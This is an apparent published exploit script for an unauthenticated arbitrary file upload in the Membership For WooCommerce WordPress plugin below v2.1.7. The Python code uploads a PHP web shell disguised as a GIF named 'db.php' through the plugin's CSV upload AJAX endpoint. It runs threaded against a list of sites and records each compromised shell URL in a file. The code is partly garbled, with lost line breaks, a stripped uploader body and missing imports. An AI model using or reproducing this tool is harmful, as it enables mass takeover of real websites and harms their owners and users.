WordPress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) (CVE: N/A)

from colorama import Fore
from colorama import init
init(autoreset=True)

headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

uploader = """
GIF89a




  Resultz

Uploader

Uploaded


""" requests.urllib3.disable_warnings() def Exploit(Domain): try: if 'http' in Domain: Domain = Domain else: Domain = 'http://'+Domain myup = {'': ('db.php', uploader)} req = requests.post(Domain + '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload', files=myup, headers=headers,verify=False, timeout=10).text req1 = requests.get(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php') if 'Ex3ptionaL' in req1: print (fg+'[+] '+ Domain + ' --> Shell Uploaded') open('Shellz.txt', 'a').write(Domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n') else: print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability') except: print(fr+' -| ' + Domain + ' --> {} [Failed]') target = open(input(fm+"Site List: "), "r").read().splitlines() mp = Pool(int(input(fm+"Threads: "))) mp.map(Exploit, target) mp.close() mp.join()
magnifiercrosschevron-down